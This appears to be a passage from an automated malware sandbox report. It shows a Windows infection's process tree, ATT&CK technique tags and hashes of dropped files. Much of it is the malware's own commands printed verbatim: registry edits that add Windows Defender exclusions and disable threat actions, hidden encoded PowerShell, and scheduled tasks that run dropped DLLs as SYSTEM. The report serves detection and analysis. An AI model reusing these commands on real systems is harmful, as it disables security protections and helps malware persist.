\"C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ZmzskowerwXEonlG\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ZmzskowerwXEonlG\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JipyTrDkU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JipyTrDkU" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JipyTrDkU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YLgKyOFzWxOqC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YLgKyOFzWxOqC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\krdeMCnRKomDOvwVunR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\krdeMCnRKomDOvwVunR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nFLFFjqrQPUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nFLFFjqrQPUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tegRANPZONsU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tegRANPZONsU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\fcblnlcRRSrBhAVB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\fcblnlcRRSrBhAVB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ZmzskowerwXEonlG /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ZmzskowerwXEonlG /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gqNpsevXQ" /SC once /ST 00:39:46 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gqNpsevXQ"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gqNpsevXQ"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "WKALCIrwIEiqhKBsn" /SC once /ST 00:37:58 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\OXjBook.exe\" y7 /flQKdidRH 385118 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "WKALCIrwIEiqhKBsn"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4620 -s 6882⤵
- Program crash
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exeC:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exeC:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\OXjBook.exeC:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\OXjBook.exe y7 /flQKdidRH 385118 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bqGGCwwWIommTRgeuN"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\JipyTrDkU\SwrKqm.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "jiLwFdOzPPQiWLm" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "jiLwFdOzPPQiWLm2" /F /xml "C:\Program Files (x86)\JipyTrDkU\UiiHDSk.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "jiLwFdOzPPQiWLm"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "jiLwFdOzPPQiWLm"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "EyAjTIEydjCaoB" /F /xml "C:\Program Files (x86)\tegRANPZONsU2\rDCnQNL.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "nwujZhVsLEYxr2" /F /xml "C:\ProgramData\fcblnlcRRSrBhAVB\dXcahzN.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "njgsfWmNUCIAXOmvm2" /F /xml "C:\Program Files (x86)\krdeMCnRKomDOvwVunR\sEZDWbs.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ZXdYLGWImophNcyfuyr2" /F /xml "C:\Program Files (x86)\YLgKyOFzWxOqC\TMmVTFJ.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "QdCYtDviHOrgqJLgZ" /SC once /ST 00:09:28 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ZmzskowerwXEonlG\wnHyoGFg\vsUtcHZ.dll\",#1 /VEdidAky 385118" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "QdCYtDviHOrgqJLgZ"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "WKALCIrwIEiqhKBsn"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3420 -s 24082⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4620 -ip 46201⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ZmzskowerwXEonlG\wnHyoGFg\vsUtcHZ.dll",#1 /VEdidAky 3851181⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ZmzskowerwXEonlG\wnHyoGFg\vsUtcHZ.dll",#1 /VEdidAky 3851182⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "QdCYtDviHOrgqJLgZ"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4484 -ip 44841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3420 -ip 34201⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
Create or Modify System Process
1Windows Service
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Pre-OS Boot
1Bootkit
1Scheduled Task/Job
1Privilege Escalation
Create or Modify System Process
1Windows Service
1Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Defense Evasion
Modify Registry
7Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
3Disable or Modify Tools
3Virtualization/Sandbox Evasion
2Pre-OS Boot
1Bootkit
1Subvert Trust Controls
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\$RECYCLE.BIN\S-1-5-18\desktop.iniFilesize
129B
MD5a526b9e7c716b3489d8cc062fbce4005
SHA12df502a944ff721241be20a9e449d2acd07e0312
SHA256e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066
SHA512d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88
-
C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpiFilesize
2.5MB
MD5600b14299eee99e62b80d9a6dff37b7c
SHA176983c41e99a24dd0138968c6551ec19da7e59b8
SHA256c91bda9c12adb27f9a800f061ca9fd403e3b41801234f6ae508be5e7075817b2
SHA5125f7c2041608ed1073dfd2a35f5ba1fa110b077b74ee9096b2e847c83420ec2ed91fc7edfd0aee0a05868c4cae7bfb74a6e16fc929e750eb8c34cdcaae468980a
-
C:\Users\Admin\1000004002\428002730b.exeFilesize
1.8MB
MD5a49d4ea8ceef49682b23f1308f5fce4b
SHA1eed6afea70bb6655a8d1289ad072a186ee3ed1de
SHA256cb560c505ccc4c84a4289a5101821494603febad6b1b665ae74fe9d41fee35dc
SHA5121efda3277e81e247645e48cd7cd0537d345cbff187bda289655e60d040d25d529f9f33988d2108321de6b0a387c254b989457a4bf30a1408a3ec162ac6ebdc70
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.jsonFilesize
187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.jsonFilesize
136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.jsonFilesize
150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
11KB
MD5d0b11bea4e1d71db2d3d28feb132f53a
SHA173255295b38c1841b351dd95a15db216bf8517f1
SHA256ff8c933acf1217d450d8c748dbb63555faf61400ecf1e5ea46afd6c36de425a1
SHA5127cdab802e51427682c34a9cf1b8eb406bf24aec08c76601e832fee94467c08e6b75bb754177ce512c1f6414ee8d2edda7efd5bdf3c76ed8ccf41d9a596bf3916
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure PreferencesFilesize
35KB
MD550d10bc195ee5c70fa66dadcb69ac8b5
SHA1defe7e7a9d8b99310a0e243adf477a47e6e1e9a4
SHA256fa654b60bb927c8e80bb4f692b39c2cd1a6b9765de325c827b5806e55ac8e8a1
SHA512357ccfe31fc27012796d2bfabebe6f2ea1f7f0b36b51543ec86c42077042ab57a0d29d821d28c6b1b18bbbdb16f5ddf86258d7b77086cef71aedb5e4d60f1d5e
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.logFilesize
2KB
MD5627073ee3ca9676911bee35548eff2b8
SHA14c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA25685b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA5123c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
1KB
MD5e080d58e6387c9fd87434a502e1a902e
SHA1ae76ce6a2a39d79226c343cfe4745d48c7c1a91a
SHA2566fc482e46f6843f31d770708aa936de4cc32fec8141154f325438994380ff425
SHA5126c112200ef09e724f2b8ab7689a629a09d74db2dcb4dd83157dd048cbe74a7ce5d139188257efc79a137ffebde0e3b61e0e147df789508675fedfd11fcad9ede
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.jsonFilesize
151B
MD5bd6b60b18aee6aaeb83b35c68fb48d88
SHA19b977a5fbf606d1104894e025e51ac28b56137c3
SHA256b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA5123500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD51a9fa92a4f2e2ec9e244d43a6a4f8fb9
SHA19910190edfaccece1dfcc1d92e357772f5dae8f7
SHA2560ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888
SHA5125d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
15KB
MD5fc9865a5bd66bd5876b3119ac5abe682
SHA189abd4b4b3c6dd5da96d555483fef85a88fcf35c
SHA256f41441b8b8f5430b95ac850b6965baa246260ddf25b20183afcc35dc300c38b9
SHA512afd677a79ad850e5c524682d1f07ad186c1639a0b6587cae7d9fb4d83d23bab5d38b572ae31426a1c51f10642e7f9734ea99e506969536e0db331a8ff637f315
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
11KB
MD504d3c80d288108c3358d2be5fc85f000
SHA111a45a6646806cf21e5a52be5d1fdcc3c7809d49
SHA25671d6dcd6d0c5100ad7da7cf38166aac022ca60f634204aef4f3f0446ae8060b6
SHA512c68d79a2f6cd9da00ec8774153f6a19eadfb76b42bcd8ee604a3e8426ed0bd8eb0eedb3e33f7a18353c8a34f47d8d8541b60444c6122dc89a632e660c62cda12
-
C:\Users\Admin\AppData\Local\Packages\favicon.pngFilesize
5.9MB
MD51603865df23efcd1dc421a48f090b2d5
SHA129c835478c413295787656da1201a3bd08582267
SHA256fc48da13fe7501b9a08daced7a7fadc6914a36c6c12461a73d2170d748be5712
SHA512e9bca0319aa1cacdd86a3b5b5904cd508a245e64399acf335299b298feec130985b68ad3456b177aa466284c6239e952aa15ed0e6545ae6ad72848d3ea6405b1
-
C:\Users\Admin\AppData\Local\Temp\[email protected]Filesize
656B
MD5184a117024f3789681894c67b36ce990
SHA1c5b687db3b27ef04ad2b2cbc9f4e523cb7f6ba7e
SHA256b10d5fef165fc89e61cd16e02eac1b90b8f94ef95218bdd4b678cd0d5c8a925e
SHA512354d3bbc1329cbbe30d22f0cf95564e44acc68d6fe91e2beb4584a473d320faf4c092de9db7f1f93cf0b235703fc8de913883985c7d5db6b596244771a1edaf7
-
C:\Users\Admin\AppData\Local\Temp\[email protected]\setup.iniFilesize
830B
MD5e6edb41c03bce3f822020878bde4e246
SHA103198ad7bbfbdd50dd66ab4bed13ad230b66e4d9
SHA2569fa80f0889358d9db3d249a2e747e27b7c01c6123b784d94d169c0e54cacf454
SHA5122d71b7d50212f980e82562af95598c430aa0875f7a9d9cc670ba2cb1f63057fb26fd747a99cb4ca08f2355d002daa79bda2236b3ad9e37a3cfef32ae5420e2a1
-
C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exeFilesize
2.1MB
MD5208bd37e8ead92ed1b933239fb3c7079
SHA1941191eed14fce000cfedbae9acfcb8761eb3492
SHA256e1fd277ffc74d67554adce94366e6fa5ebc81f8c4999634bcc3396164ba38494
SHA512a9c3c32573a16b7ca71a12af6e8c8e88502b66bae2465a82dd921fbc6e0c833b9b1c2d436963df189dd9d68568e1be9128826a2e59f1d5fe066b637d2d866715
-
C:\Users\Admin\AppData\Local\Temp\1000005001\7c602150df.exeFilesize
2.4MB
MD59149195baeaa821266a65b19cc4f6755
SHA1b58d6265595e914025ea2d55180bdc776948d371
SHA256efc9bafe765180f68df92f58d73ae5416b80bf6190c94fa30efa021837f0f49d
SHA5128c91ca8f91f4d043ed16ee0af6363b3f02a427066d6429a43e386951c0fb0184d4c285f10ffe57302c216a2a1ca51b6add425a8130ee93a9f3188eaccc3275e1
-
C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exeFilesize
304KB
MD584bf36993bdd61d216e83fe391fcc7fd
SHA1e023212e847a54328aaea05fbe41eb4828855ce6
SHA2568e6d8b5a004c8f21bee1bbe4213c6d78cf80e439b38f587e963e9bb4569aaffa
SHA512bb3241949618ad2d39057e085e150f43b4d41d74efc4658d9c27f8c0ec80420191517a2c0b6b7e225c4e50e02cd031cdfd178e05b9a869847a3c27b210d09caf
-
C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exeFilesize
518KB
MD5c4ffab152141150528716daa608d5b92
SHA1a48d3aecc0e986b6c4369b9d4cfffb08b53aed89
